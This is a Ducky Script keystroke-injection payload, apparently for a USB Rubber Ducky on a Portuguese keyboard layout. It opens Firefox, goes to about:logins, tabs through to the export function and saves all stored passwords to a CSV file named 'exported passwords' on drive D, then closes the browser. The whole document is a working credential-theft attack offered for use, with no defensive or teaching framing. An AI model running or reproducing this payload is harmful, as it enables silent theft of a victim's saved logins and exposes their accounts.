DELAY 1000
GUI r
DELAY 500
STRING firefox
ENTER
DELAY 2000
STRING about
DELAY 500
SHIFT .  # Shift + Period to type colon (:) on pt-pt layout
DELAY 500
STRING logins
ENTER
DELAY 1300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 500
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 1300
STRING D
DELAY 1000
SHIFT .  # Shift + Period to type colon (:) on pt-pt layoutDELAY 500
DELAY 1000
# Shift + Backtick (`) + AltGr
RIGHT_ALT
SHIFT
STRING `
RIGHT_ALT
SHIFT
DELAY 500
STRING exported
DELAY 500
STRING passwords
DELAY 500 
STRING .
DELAY 500
STRING csv
DELAY 300
ENTER
DELAY 2000
# Close Firefox
ALT F4